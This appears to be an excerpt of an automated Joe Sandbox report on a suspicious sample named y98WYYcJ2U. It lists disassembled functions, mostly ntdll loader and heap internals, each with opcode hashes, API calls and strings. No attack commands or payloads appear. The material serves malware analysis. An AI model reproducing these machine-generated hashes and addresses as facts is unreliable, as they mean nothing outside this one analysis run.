Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a076cc86c975e93f0c3c2ae4e6922a5608f4fbe8a5f6882728b28a254b5976e
Instruction ID: 8029dbfb3c72a6645e33ca26eac6cd5d023fdeae3934e6984b4e29a8e29a3611
Opcode Fuzzy Hash: 1a076cc86c975e93f0c3c2ae4e6922a5608f4fbe8a5f6882728b28a254b5976e
Instruction Fuzzy Hash: D4900235305040929940AA9C5A44A4E510557F1301B61E41BE4418519C8D5488616129

Uniqueness

Uniqueness Score: -1.00%

Function 7268A4F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891a317ee1678c545fab3bb5a8e1cc9f5bad07870e6c26e4f7a1229eb32da86f
Instruction ID: 3605b701eb9638bea5649ffdf5ca2e94b931a995ac0eeb21aee284cf8b53cbc3
Opcode Fuzzy Hash: 891a317ee1678c545fab3bb5a8e1cc9f5bad07870e6c26e4f7a1229eb32da86f
Instruction Fuzzy Hash: 9E90023520504542D540755C565861A101657D1241F61E437E142851AECE2588917139

Uniqueness

Uniqueness Score: -1.00%

Function 7268A4C0, Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e25b44407322f46c94eb6a8fd9c670113baeaf2082b5284e4f813f8dc86c02
Instruction ID: fe458323369ed13bba17abd9b44d5e5ea9dac7cbf764d7dd8f3ecda96b6b07b4
Opcode Fuzzy Hash: 92e25b44407322f46c94eb6a8fd9c670113baeaf2082b5284e4f813f8dc86c02
Instruction Fuzzy Hash: 15900235605040C24580756C564890A600577E1211761E517E1858515CCD198855A26D

Uniqueness

Uniqueness Score: -1.00%

Function 7268A4A0, Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155b68db9f670eeb8e245deaa0873e8eb3cfdcf08c41b8d96ad3597663b9fe68
Instruction ID: 9cd7f41d71011f9339ad57158b056c580759d48b5254a1cf65f5bb2ea7e15a52
Opcode Fuzzy Hash: 155b68db9f670eeb8e245deaa0873e8eb3cfdcf08c41b8d96ad3597663b9fe68
Instruction Fuzzy Hash: BB90023530504043D580755C565860A5005A7E2301F61E417E0818519CDD158856622A

Uniqueness

Uniqueness Score: -1.00%

Function 7268A570, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273bc6ae6f014f54805285ceccd3ac358136dfe3fe166a0296721f77795ec234
Instruction ID: 41deb914b836d6c690bb10e47f97f1d1ddd66aa0858e74daa41b474f66fd58ef
Opcode Fuzzy Hash: 273bc6ae6f014f54805285ceccd3ac358136dfe3fe166a0296721f77795ec234
Instruction Fuzzy Hash: BB900275209080C2D551665C4644F0E510957E1245FA1D41BE0458559C8D258952E129

Uniqueness

Uniqueness Score: -1.00%

Function 7268A540, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24c650a7e60851858da71ed7f557ee02b92fc50424321ada95d890465025e87
Instruction ID: a2edbeb2e1a6ff6939a968536b3114eab2d2604089fca808c88983a270080155
Opcode Fuzzy Hash: e24c650a7e60851858da71ed7f557ee02b92fc50424321ada95d890465025e87
Instruction Fuzzy Hash: 44900235246081925985B55C464450B500667E12417A1D417E1818915C8D269856E629

Uniqueness

Uniqueness Score: -1.00%

Function 7268A550, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfda31a0abff430ab731272e1a5d61f807f0fee88698be9984022b2639c64357
Instruction ID: a244c049badf90890be20ffbd94e4613dabfdaf15c8ffe64b84bf045cec83e02
Opcode Fuzzy Hash: cfda31a0abff430ab731272e1a5d61f807f0fee88698be9984022b2639c64357
Instruction Fuzzy Hash: 9190023521544082D541696C4A44B0B101957D1342FA1D51BE041851ACCD158962A129

Uniqueness

Uniqueness Score: -1.00%

Function 7268A530, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56035a4a2bfb248e1146bfc6a320c7d474b10fd5b9ffa9065e89eae8e42e8a8
Instruction ID: 52d58b694cb16034efb7a694890897421cc72ee16bf70c9ab77389f46440d764
Opcode Fuzzy Hash: b56035a4a2bfb248e1146bfc6a320c7d474b10fd5b9ffa9065e89eae8e42e8a8
Instruction Fuzzy Hash: 5490023560904442D581755C469470A101957D1241FA1D417E0428519D8E558B56B6A9

Uniqueness

Uniqueness Score: -1.00%

Function 7268A370, Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 22c0a9966b7cb6d411bcc4ad4aebf62832e28a4ef58fdc126a168433b54f9205
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 726822F7, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 193COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,0000003C,7271FD38,00000154,7265AC83,02BE0000,?,?,?,.mui,?,?,?,?,?), ref: 7268235F
RtlDosApplyFileIsolationRedirection_Ustr.210A(00000001,?,00000000,?,?,?,?,00000000,00000000), ref: 726823A8
RtlFindActivationContextSectionString.210A(00000007,00000000,00000002,?,?,00000001,?,00000000,?,?,?,?,00000000,00000000), ref: 726BCDD8

Strings

$, xrefs: 72682367
@, xrefs: 7268234B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ActivationApplyContextFileFindIsolationRedirection_SectionStringUstrmemset
String ID: $$@
API String ID: 2010900335-1194432280
Opcode ID: 4f545bfd3d37f99956a1cd613263edcf26f19100a6cbb38c33421c76867bdc8d
Instruction ID: db0de5748a5e698bb4f03c897e58cb0a81373ef32b04e84704a9fc404ae89f2e
Opcode Fuzzy Hash: 4f545bfd3d37f99956a1cd613263edcf26f19100a6cbb38c33421c76867bdc8d
Instruction Fuzzy Hash: 7281FA72D002699FDB218F58CD44BDABBB8AF44714F1045DAA90AB7280D7749E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004157B0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 146synchronizationpipetimeCOMMON

Download Yara Rule

APIs

BeginUpdateResourceW.KERNEL32(00000000,00000000), ref: 004157EA
CallNamedPipeW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000), ref: 0041582B
WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041585C
CompareFileTime.KERNEL32(00000000,00000000), ref: 00415890
InterlockedDecrement.KERNEL32(?), ref: 0041589A
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004158B0
CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 004158BC
ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415919
GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 00415937

Strings

, xrefs: 00415831
Ou, xrefs: 004158D6

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: BeginBoostCallCompareConsoleCreateDecrementDeleteFileInterlockedMountMultipleMutexNamedObjectsPipePointPriorityProcessReadResourceTimeUpdateVolumeWait
String ID: $Ou
API String ID: 1265529784-3001729723
Opcode ID: ada05f539c5f003d3589c002d410fb23ea914cb8d95bcd6de6549f635539ac3e
Instruction ID: eecc73c0a143e4dcf3d4bfa5e089b9fa8c7e054d1e01ce14c46905c1900ff184
Opcode Fuzzy Hash: ada05f539c5f003d3589c002d410fb23ea914cb8d95bcd6de6549f635539ac3e
Instruction Fuzzy Hash: D7516E71A41204EFEB50DF90DD49BEEBB74BB98711F11802AE6046B2D0C7B4A944CF99

Uniqueness

Uniqueness Score: -1.00%

Function 7271D6B4, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 275timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738680,727379A0,00000000,HEAP: ,727379A0,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000), ref: 7271D6E8
RtlAcquireSRWLockExclusive.210A(72738684,72738680,727379A0,00000000,HEAP: ,727379A0,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C), ref: 7271D6F5

Part of subcall function 72661ED0: RtlDllShutdownInProgress.210A(00000000), ref: 72661F0A
Part of subcall function 72661ED0: ZwWaitForAlertByThreadId.210A(?,00000000,?,?,?,?,?,?,?,00000000), ref: 72661FF3

RtlDebugPrintTimes.210A(?,0000000C,00000000,72738684,72738680,727379A0,00000000,HEAP: ,727379A0,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000), ref: 7271D721
RtlDebugPrintTimes.210A(?,00000004,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D7A2
RtlDebugPrintTimes.210A(?,00000004,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D7C5
RtlDebugPrintTimes.210A(?,?,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D7F1
RtlDebugPrintTimes.210A(00000000,00000000,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D8BC
RtlReleaseSRWLockExclusive.210A(?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D8CA
RtlReleaseSRWLockExclusive.210A(?,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D8D3
RtlDebugPrintTimes.210A(?,00000004,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D906
RtlDebugPrintTimes.210A(?,00000004,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D925
RtlDebugPrintTimes.210A(?,?,?,?,726EBC5F,?,72720678,0000000C,726F3CCA,00000000,00000002,000000FF,0000002C,00000000,00000030), ref: 7271D956

Strings

HEAP: , xrefs: 7271D6CA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugPrintTimes$ExclusiveLock$AcquireRelease$AlertProgressShutdownThreadWait
String ID: HEAP:
API String ID: 4202936939-2466845122
Opcode ID: 69b861c1ba689c23e22ee5ee644d7cb74264fdac606714b9a124a3605f7ea4dd
Instruction ID: 36e4c551923691525e32cc42008c23e97c589b8871b9ab122005d0f64ecbc90f
Opcode Fuzzy Hash: 69b861c1ba689c23e22ee5ee644d7cb74264fdac606714b9a124a3605f7ea4dd
Instruction Fuzzy Hash: 00A18972A043168FC705CE28CA92A1AB7E6AFC8B14F15496DE946DB355EB30EC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 72651539, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 72658679: RtlInitUnicodeString.210A(?,?,?,00000000,00000000,?,?,?,726522F7,?,?,00000000,00000006,00000000,00000000,?), ref: 726586B8
Part of subcall function 72658679: RtlInitUnicodeString.210A(?,?,?,?,?,00000000,00000000,?,?,?,726522F7,?,?,00000000,00000006,00000000), ref: 726586C8
Part of subcall function 72658679: RtlCompareUnicodeStrings.210A(?,?,726522F7,?,00000001,?,?,?,?,?,00000000,00000000,?,?,?,726522F7), ref: 726586E3

RtlInitUnicodeString.210A(00AA0000,?,00000154,00000000,?,?,?,?,00000000,00AA0000,00000019,00000000,?,00000000,?), ref: 72651607
_wcsicmp.210A(-00000002,?,00000154,00000000,?,?,?,?,00000000,00AA0000,00000019,00000000,?,00000000,?), ref: 726A7EDB

Strings

en-US, xrefs: 726A7F02
en-US, xrefs: 726A7FCF, 726A7FD9, 726A7FE5, 726A7FEB, 726A7FF8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Unicode$InitString$CompareStrings_wcsicmp
String ID: en-US$en-US
API String ID: 2711047564-3930232808
Opcode ID: af3ebf44d31683e478d9660dc43f9fe4be18e6853ce4c1aef7d76aeb6c6c2e5a
Instruction ID: 27cb8d98f007e4cd1a73d414bf1ea80c38042f5e358f458aa9ebd2930bf855b4
Opcode Fuzzy Hash: af3ebf44d31683e478d9660dc43f9fe4be18e6853ce4c1aef7d76aeb6c6c2e5a
Instruction Fuzzy Hash: B471C3B1A002169BCB2A8B5EC1A057EB7F4EF50319B2140AFE8539B6D1D634DE81C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 72644380, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DbgPrintEx.210A(00000033,00000000,SXS: %s() called with invalid flags 0x%08lx,RtlDeactivateActivationContext,FFFFFFFE), ref: 726A14B8
DbgPrintEx.210A(00000033,00000000,SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix,RtlDeactivateActivationContext,?,?), ref: 726A14D7
RtlRaiseStatus.210A(C000000D), ref: 726A14EB
RtlRaiseException.210A(?,?,?), ref: 726A1563
RtlReleaseActivationContext.210A(?), ref: 726A1570

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 726A14AF
SXS: %s() called with invalid flags 0x%08lx, xrefs: 726A14A2
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 726A14CE
RtlDeactivateActivationContext, xrefs: 726A149D, 726A14AA, 726A14C9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: PrintRaise$ActivationContextExceptionReleaseStatus
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 1148088771-1245972979
Opcode ID: 7d03c34ca54695f080440ad54129211176c0d015e239adcda12a50e610238955
Instruction ID: d3f67657fdfea8e3390548b3d83053e48a21ef3de92afeee7de1c68049f43316
Opcode Fuzzy Hash: 7d03c34ca54695f080440ad54129211176c0d015e239adcda12a50e610238955
Instruction Fuzzy Hash: F94101B26107029FD716CE1CC862B1AB7F1EB80754F50896FE8969B2C0DB30ED018B95

Uniqueness

Uniqueness Score: -1.00%

Function 7265E130, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 128COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000050), ref: 7265E174

Strings

Status: 0x%08lx, xrefs: 726AC703
DLL search path passed in externally: %ws, xrefs: 726AC69D
minkernel\ntdll\ldrapi.c, xrefs: 726AC67D, 726AC714
LdrpInitializeDllPath, xrefs: 726AC6A4
LdrGetDllHandleEx, xrefs: 726AC673, 726AC70A
DLL name: %wZ, xrefs: 726AC66C
minkernel\ntdll\ldrutil.c, xrefs: 726AC6AE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memset
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrutil.c
API String ID: 2221118986-723415462
Opcode ID: b8bb441752318fd18c1e45b3e33445938ae9701799cc58f70cc73e787484440f
Instruction ID: 4a02b645fd6d2d4abd2f61fb8214da7aa7dc84b0a91bbe899ea77b7f976e1ee8
Opcode Fuzzy Hash: b8bb441752318fd18c1e45b3e33445938ae9701799cc58f70cc73e787484440f
Instruction Fuzzy Hash: F0412336A44346ABD726CA2DCD01B1A7BE5AFC0715F10060BFC96AB2C1D730D851C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 72686299, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,0000002C,?,00000000,?,?,?,726686CC), ref: 726862EE
RtlAssert.210A(Internal error check failed,minkernel\ntdll\sxsisol.cpp,0000020C,This != NULL,?,00000000,?,?,?,726686CC), ref: 726BF2F7
RtlAssert.210A(Internal error check failed,minkernel\ntdll\sxsisol.cpp,00000219,rUS.Length <= This->PrivatePreallocatedString->MaximumLength,?,00000000,?,?,?,726686CC), ref: 726BF326

Strings

Internal error check failed, xrefs: 726BF2F2, 726BF321
minkernel\ntdll\sxsisol.cpp, xrefs: 726BF2ED, 726BF31C
rUS.Length <= This->PrivatePreallocatedString->MaximumLength, xrefs: 726BF312
This != NULL, xrefs: 726BF2E3
(This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL), xrefs: 726BF306

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Assert$memset
String ID: (This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL)$Internal error check failed$This != NULL$minkernel\ntdll\sxsisol.cpp$rUS.Length <= This->PrivatePreallocatedString->MaximumLength
API String ID: 2494167153-3589341846
Opcode ID: 8cb55bffe939100ee8b9327626f9bc47e4745b83b26e7739eb6a23438e06e140
Instruction ID: 9788822fa79a123c8b0c3100cc671fce5f0f0a3b176830a0ca1a6af4b5eec24b
Opcode Fuzzy Hash: 8cb55bffe939100ee8b9327626f9bc47e4745b83b26e7739eb6a23438e06e140
Instruction Fuzzy Hash: 6D3190746017029BD32A9F2CC550E16B7F1EF44714B208A6FE88BCB6C6E734E805C795

Uniqueness

Uniqueness Score: -1.00%

Function 72682020, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42COMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(01000000,\System32\,?,72681FF0,01000000,01000000,\SysWOW64,02140000,00000000,01000000,00000000), ref: 72682045

Strings

\SyCHPE32\, xrefs: 726BCC05
System32, xrefs: 72682041, 72682059
SysARM32, xrefs: 726BCC27
SyCHPE32, xrefs: 726BCC0F
\SysWOW64\, xrefs: 72682060
SysWOW64, xrefs: 7268203C
\System32\, xrefs: 72682050
\SysARM32\, xrefs: 726BCC1D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitStringUnicode
String ID: SyCHPE32$SysARM32$SysWOW64$System32$\SyCHPE32\$\SysARM32\$\SysWOW64\$\System32\
API String ID: 4228678080-2516413534
Opcode ID: 6c8a22db2d4dcdefc7d518cf240785afe9327e7ecd2dc05a5cbe0010fa5739c3
Instruction ID: 2f567ab99e92c97e12478c8c344b32e40d45232dec24116de1075634db948e9b
Opcode Fuzzy Hash: 6c8a22db2d4dcdefc7d518cf240785afe9327e7ecd2dc05a5cbe0010fa5739c3
Instruction Fuzzy Hash: C4F01D615042C19B96674C1C9781713BA5BABA125FF708113EC42CB6FEC22FCAA9C396

Uniqueness

Uniqueness Score: -1.00%

Function 726C61B3, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlNtStatusToDosErrorNoTeb.210A(00000000,00000000,?,00000000,00000000,00000000,?), ref: 726C628A
RtlDebugPrintTimes.210A(00000004,00000024,00000000,00000000,?,00000000,00000000,00000000,?), ref: 726C62B4
RtlDebugPrintTimes.210A(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,726C6184,00000000,00000000,00000000,?,00000000), ref: 726C62D7

Strings

minkernel\ntdll\ldrdload.c, xrefs: 726C6223
Unknown, xrefs: 726C61FD, 726C620F
$, xrefs: 726C627D
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 726C6213
LdrpRedirectDelayloadFailure, xrefs: 726C6219

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugPrintTimes$ErrorStatus
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 4233137217-4227709934
Opcode ID: 3e22758a37e99659981fbf23eddaebc5d109c4ffcc5341e6a9da30c2c6b62556
Instruction ID: c567ec23c9f5945323d8e3eb68b98b4c115dce222ebef492269e10fe0cbdad56
Opcode Fuzzy Hash: 3e22758a37e99659981fbf23eddaebc5d109c4ffcc5341e6a9da30c2c6b62556
Instruction Fuzzy Hash: 1D417C71A0020AAFCF01DF98C985ADEBBB5FF88315F10412EED06A7284D735E991CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726471A0, Relevance: 13.7, APIs: 9, Instructions: 162COMMON

Download Yara Rule

APIs

RtlIpv4StringToAddressA.210A(00000000,?,00000000,00000000), ref: 726471CB

